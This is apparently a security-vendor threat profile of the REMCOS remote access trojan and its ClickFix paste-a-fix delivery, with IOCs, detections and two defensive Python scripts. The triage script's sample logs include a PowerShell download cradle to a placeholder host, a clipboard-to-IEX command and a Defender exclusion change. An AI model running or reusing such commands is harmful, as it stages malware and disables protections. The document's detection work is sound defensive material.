Cybereason GSOC has observed a notable increase in infections involving REMCOS RAT, often delivered through vulnerable or potentially unwanted applications (PUAs).
Analysis Summary
# Tool/Technique: REMCOS RAT (ClickFix Delivery)
## Overview
REMCOS (Remote Control and Surveillance) is a commercially sold Remote Access Trojan (RAT), originally marketed by Breaking Security as a legitimate remote administration tool and widely abused by criminals since. Recent campaigns observed by Cybereason GSOC show a surge in infections that rely on "ClickFix" social engineering: a fake error page instructs the user to run a supposed "fix" for a browser or software problem, the pasted command stages the next payload, and REMCOS is ultimately deployed, frequently through vulnerable or Potentially Unwanted Applications (PUAs) that lend the activity a legitimate appearance.
## Technical Details
- **Type:** Malware Family (Remote Access Trojan)
- **Platform:** Windows
- **Capabilities:** Remote surveillance, data exfiltration, system control, and persistence.
- **First Seen:** Approximately 2016 (Initial release); ClickFix variant observed in late 2024.
## MITRE ATT&CK Mapping
- **[TA0001 - Initial Access]**
- [T1566.002 - Phishing: Spearphishing Link]
- **[TA0002 - Execution]**
- [T1204.002 - User Execution: Malicious File]
- [T1059.001 - Command and Scripting Interpreter: PowerShell]
- **[TA0003 - Persistence]**
- [T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder]
- **[TA0005 - Defense Evasion]**
- [T1562.001 - Impair Defenses: Disable or Modify Tools]
- [T1140 - Deobfuscate/Decode Files or Information]
- **[TA0009 - Collection]**
- [T1113 - Screen Capture]
- [T1056.001 - Input Capture: Keylogging]
- **[TA0011 - Command and Control]**
- [T1071.001 - Application Layer Protocol: Web Protocols]
## Functionality
### Core Capabilities
- **Remote Administration:** Full control over the file system, processes, and services.
- **Surveillance:** Real-time monitoring via screen capture (screenshots) and webcam access.
- **Information Stealing:** Keylogging to capture credentials and sensitive inputs.
- **File Management:** Capability to upload, download, and execute additional payloads.
### Advanced Features
- **Social Engineering Tooling:** "ClickFix" lures that present a fake browser or rendering error and instruct the user to copy a command and paste it into the Windows Run dialog or a PowerShell prompt; the pasted command, typically PowerShell, downloads and runs the next stage.
- **Bypass Techniques:** Staging through vulnerable or potentially unwanted applications so that the malicious activity is attributed to software the user knowingly installed, blending it with legitimate process behaviour and slipping past perimeter controls that trust those applications.
- **Encrypted C2:** The configuration block is stored RC4-encrypted and command-and-control traffic is encrypted as well, which defeats naive payload signatures on the wire and forces defenders onto behavioural and host-based detection.
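The RC4-protected configuration mentioned here (and the RC4 decryption keys the detection section below says YARA rules target) can be recovered with a few lines of code. The following Python is an added example, not code from the Cybereason report or from REMCOS itself. It follows the layout public REMCOS analyses describe for the `SETTINGS` resource: a one-byte key length, the RC4 key, then the RC4-encrypted configuration. The sample blob, its key and its field values are constructed here, and the `|\x1e\x1e\x1f|` field delimiter is an assumption that differs between REMCOS versions, so adjust it to the sample in hand.

```python
"""Decrypt a REMCOS-style RC4-protected configuration blob.

Added example. Layout follows public descriptions of the REMCOS SETTINGS
resource: byte 0 = key length, then the key, then RC4 ciphertext.
"""
from typing import Dict, List

# ASSUMPTION: the field delimiter differs between REMCOS versions.
FIELD_DELIM = b"|\x1e\x1e\x1f|"


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). Encryption and decryption are the same operation."""
    if not key:
        raise ValueError("RC4 key must not be empty")
    s = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                         # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def build_settings_blob(key: bytes, fields: List[bytes]) -> bytes:
    """Construct a blob in the assumed layout (used only to build the sample)."""
    if not 0 < len(key) < 256:
        raise ValueError("key length must fit in one byte")
    return bytes([len(key)]) + key + rc4(key, FIELD_DELIM.join(fields))


def parse_settings_blob(blob: bytes) -> Dict[str, object]:
    """Recover the RC4 key and the plaintext fields from a SETTINGS-style blob."""
    if len(blob) < 2:
        raise ValueError("blob too short")
    key_len = blob[0]
    if key_len == 0 or len(blob) <= 1 + key_len:
        raise ValueError("malformed blob: key length %d" % key_len)
    key = blob[1:1 + key_len]
    plaintext = rc4(key, blob[1 + key_len:])
    return {"key": key, "fields": plaintext.split(FIELD_DELIM)}


# Constructed sample: TEST-NET address and illustrative field values only;
# real builds order and interpret fields differently between versions.
SAMPLE_KEY = b"pass1234"
SAMPLE_FIELDS = [b"203.0.113.10:2404:1", b"Remcos", b"RemoteHost", b"1"]
SAMPLE_BLOB = build_settings_blob(SAMPLE_KEY, SAMPLE_FIELDS)


if __name__ == "__main__":
    cfg = parse_settings_blob(SAMPLE_BLOB)
    print("RC4 key:", cfg["key"])
    for idx, value in enumerate(cfg["fields"]):
        print(f"field[{idx}] = {value!r}")
```

To use it on a real sample, extract the `SETTINGS` RCDATA resource from the unpacked binary (for instance with `pefile`) and pass its bytes to `parse_settings_blob`; if the split returns a single field, the delimiter is the first thing to revisit. The key recovered this way is the value a YARA rule keyed on the configuration block would match.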
## Indicators of Compromise
- **File Hashes:** Not listed here; specific hashes vary by campaign, so pull current REMCOS sample hashes from up-to-date threat feeds.
- **File Names:** `Remcos.exe`, `install.bat`, various obfuscated `.ps1` or `.vbs` scripts.
- **Registry Keys:**
- `HKEY_CURRENT_USER\Software\Remcos`
- `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run` (for persistence)
- **Network Indicators:**
- `94[.]156[.]174[.]228` (Example C2 IP)
- `remcos[.]biz` (Domain)
- `geoplugin[.]net` (legitimate geolocation service that REMCOS queries for the victim's IP location; a weak indicator on its own, meaningful only in combination with the others)
- **Behavioral Indicators:**
- Unexpected PowerShell execution with Base64 encoded commands.
- Scripts that read or write the clipboard (for example via `clip.exe` or `Get-Clipboard`), the hallmark of a pasted ClickFix command.
- Unauthorized modification of Windows Defender exclusion lists.
## Associated Threat Actors
- **UAC-0050:** Known for frequent use of REMCOS in various campaigns.
- **Generic Cybercriminals:** Due to its "Malware-as-a-Service" availability, it is used by a wide array of financially motivated actors.
## Detection Methods
- **Signature-based:** Antivirus detection of known REMCOS stubs and of samples signed with Breaking Security's code-signing certificate.
- **Behavioral Detection:** Monitoring for suspicious PowerShell activity, in particular `Invoke-Expression` (IEX) combined with clipboard reads, `-EncodedCommand` arguments, and download cradles launched from the Run dialog or a browser-initiated shell.
- **YARA Rules:** Target the unique strings in the REMCOS communication protocol and the specific RC4 decryption keys often used in its configuration block.
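The behavioural indicators listed under Indicators of Compromise and the PowerShell-centric detections in this section can be exercised against process-creation logs. The following Python is an added example, not Cybereason's detection content: it decodes `-EncodedCommand` arguments (PowerShell expects UTF-16LE base64), then looks for the IEX-plus-clipboard combination, download cradles, hidden-window flags and Defender exclusion changes, and scores each command line. The log lines, the scoring weights, the alert threshold and the 203.0.113.10 host are all constructed for the example.

```python
"""Triage PowerShell command lines for ClickFix/REMCOS-style behaviour.

Added example. Input is a process command line (Sysmon EID 1 / 4688 style);
output is a Finding with the decoded payload, matched indicators and a score.
"""
import base64
import binascii
import re
from dataclasses import dataclass, field
from typing import List, Optional

# -EncodedCommand accepts any unambiguous prefix; cover the common spellings.
ENC_FLAG = re.compile(r"(?i)\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")

# Ordered (name, pattern, weight). Weights are illustrative, not vendor tuning.
INDICATORS = [
    ("hidden_window", re.compile(r"(?i)-w(?:indowstyle)?\s+hidden|-nop(?:rofile)?\b"), 1),
    ("download_cradle", re.compile(
        r"(?i)downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b|"
        r"invoke-restmethod|\birm\b|start-bitstransfer"), 2),
    ("invoke_expression", re.compile(r"(?i)\biex\b|invoke-expression"), 2),
    ("clipboard_access", re.compile(r"(?i)get-clipboard|\bclip(?:\.exe)?\b|\.clipboard\]"), 2),
    ("defender_tamper", re.compile(
        r"(?i)add-mppreference|-exclusionpath|set-mppreference[^|;]*-disable"), 3),
]
ENCODED_WEIGHT = 1
ALERT_THRESHOLD = 4


@dataclass
class Finding:
    cmdline: str
    decoded: Optional[str]
    indicators: List[str] = field(default_factory=list)
    score: int = 0
    alert: bool = False


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the UTF-16LE plaintext behind -EncodedCommand, or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("utf-16-le", errors="replace")


def analyze(cmdline: str) -> Finding:
    """Match indicators against the raw line plus any decoded payload."""
    decoded = decode_encoded_command(cmdline)
    f = Finding(cmdline=cmdline, decoded=decoded)
    haystack = cmdline if decoded is None else cmdline + "\n" + decoded
    if decoded is not None:
        f.indicators.append("encoded_command")
        f.score += ENCODED_WEIGHT
    for name, pattern, weight in INDICATORS:
        if pattern.search(haystack):
            f.indicators.append(name)
            f.score += weight
    # ClickFix signature: clipboard contents fed straight into IEX.
    clip_iex = {"clipboard_access", "invoke_expression"} <= set(f.indicators)
    f.alert = f.score >= ALERT_THRESHOLD or clip_iex or "defender_tamper" in f.indicators
    return f


def triage(lines: List[str]) -> List[Finding]:
    return [analyze(line) for line in lines]


def encode_ps(command: str) -> str:
    """Encode as PowerShell's -EncodedCommand expects (UTF-16LE, base64)."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


# Constructed sample log lines (203.0.113.10 is a TEST-NET address).
SAMPLE_LOG_LINES = [
    "powershell.exe -nop -w hidden -enc "
    + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/fix.ps1')"),
    'powershell.exe -c "Get-Clipboard | iex"',
    'powershell.exe -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath C:\\Users\\Public"',
    "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1",
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_LOG_LINES):
        flag = "ALERT" if finding.alert else "ok   "
        print(f"{flag} score={finding.score} {finding.indicators} :: {finding.cmdline[:70]}")
```

Decoding before matching is the point: the first sample line carries no readable IEX or URL in the raw command, and a rule that only inspects the visible string misses it. The Defender-tampering rule alerts regardless of score because an exclusion change is rarely legitimate from an interactive user shell; tune the other weights against your own baseline of administrative PowerShell use.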
## Mitigation Strategies
- **User Training:** Educate employees to never copy-paste commands from websites into a terminal (the "ClickFix" lure).
- **Process Restrictions:** Restrict PowerShell and Command Prompt for non-administrative users (Constrained Language Mode, AppLocker or WDAC script rules) and enable PowerShell script block logging so that encoded commands are recorded in clear text for investigation.
- **Application Whitelisting:** Prevent the execution of unauthorized Remote Access Tools and PUAs.
- **Network Segmentation:** Limit outbound traffic to known-good domains and block common C2 ports.
## Related Tools/Techniques
- **AsyncRAT:** A .NET-based RAT (REMCOS itself is native C++) that is delivered through the same kinds of lures and loaders.
- **Agent Tesla:** Information stealer frequently seen alongside REMCOS for credential harvesting.
- **ClickFix:** A growing social engineering technique in which fake browser error pages instruct the victim to paste a "fix" command into the Run dialog or a terminal.